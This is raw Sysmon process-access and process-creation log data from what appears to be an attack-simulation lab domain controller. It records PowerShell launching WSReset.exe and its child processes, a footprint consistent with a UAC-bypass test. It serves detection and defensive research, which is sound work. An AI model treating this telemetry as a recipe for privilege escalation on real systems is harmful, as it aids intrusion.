08:08:03.945{466BC892-02AD-60E8-0B00-00000000CF01}624808C:\Windows\system32\lsass.exe{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054850Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.945{466BC892-02AD-60E8-0B00-00000000CF01}624808C:\Windows\system32\lsass.exe{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054849Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.891{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054848Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.891{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054847Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.891{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054846Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.860{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054845Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.844{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 23542300x80000000000000001054844Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.844{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FCE78667D2FF0DE1512285534BA0403F,SHA256=0B111B32D228771928E4E043E073511DEF99E4B85F5E641A543538791D1DDE14,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054843Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.844{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054842Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.844{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054841Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.844{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054840Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.844{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054839Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.844{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054838Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.821{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\System32\OpenWith.exe10.0.14393.4169 (rs1_release.210107-1130)Pick an appMicrosoft® Windows® Operating SystemMicrosoft CorporationOpenWith.exeC:\Windows\system32\OpenWith.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=196A5E5EF42F8CADACD75FAF17E18689,SHA256=8E9759AE4C7644BC975A2A33BC9E4D17C39B4D6DAAE19F7401181C05DC9D1B90,IMPHASH=3DC53F3258E7C5C7131E7C13F7BD06C9{466BC892-02AF-60E8-0C00-00000000CF01}844C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 23542300x8000000000000000810417Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:03.541{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92A9F3F5437654BCD56816919DC20B77,SHA256=84F5D5E1D18EDD88D5CC556226012224ADD020CEC7CC39D978CC24A9355AB6F3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054837Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.807{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F863-60EB-FB7D-00000000CF01}1736C:\Windows\system32\WSReset.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054836Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.807{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F863-60EB-FB7D-00000000CF01}1736C:\Windows\system32\WSReset.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054835Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.760{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F863-60EB-FB7D-00000000CF01}1736C:\Windows\system32\WSReset.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054834Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.760{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F863-60EB-FB7D-00000000CF01}1736C:\Windows\system32\WSReset.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054833Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.760{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F863-60EB-FB7D-00000000CF01}1736C:\Windows\system32\WSReset.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054832Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.691{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F863-60EB-FC7D-00000000CF01}7268C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054831Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.691{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F863-60EB-FC7D-00000000CF01}7268C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054830Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.675{466BC892-F863-60EB-FC7D-00000000CF01}72688064C:\Windows\system32\conhost.exe{466BC892-F863-60EB-FB7D-00000000CF01}1736C:\Windows\system32\WSReset.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054829Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.660{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F863-60EB-FC7D-00000000CF01}7268C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054828Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.660{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054827Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.660{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054826Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.660{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054825Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.660{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054824Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.660{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F863-60EB-FB7D-00000000CF01}1736C:\Windows\system32\WSReset.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054823Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.660{466BC892-F862-60EB-F97D-00000000CF01}96246820癟毗ꑺ꥗⸟썸�렍跰瘍篋촋첎䌚୿ꇧ叚╣一WindowsPowerShell\v1.0\powershell.exe{466BC892-F863-60EB-FB7D-00000000CF01}1736C:\Windows\system32\WSReset.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\shell32.dll+3cdcf|C:\Windows\System32\shell32.dll+3cc5c|C:\Windows\System32\shell32.dll+3c9ac|C:\Windows\System32\shell32.dll+122467|C:\Windows\System32\shell32.dll+1223c5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+38b30c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2d41f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+af11c7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c0449|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01b0|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+1021d3a7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+1021d3a7(wow64) 154100x80000000000000001054822Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.660{466BC892-F863-60EB-FB7D-00000000CF01}1736C:\Windows\System32\WSReset.exe10.0.14393.4169 (rs1_release.210107-1130)This tool resets the 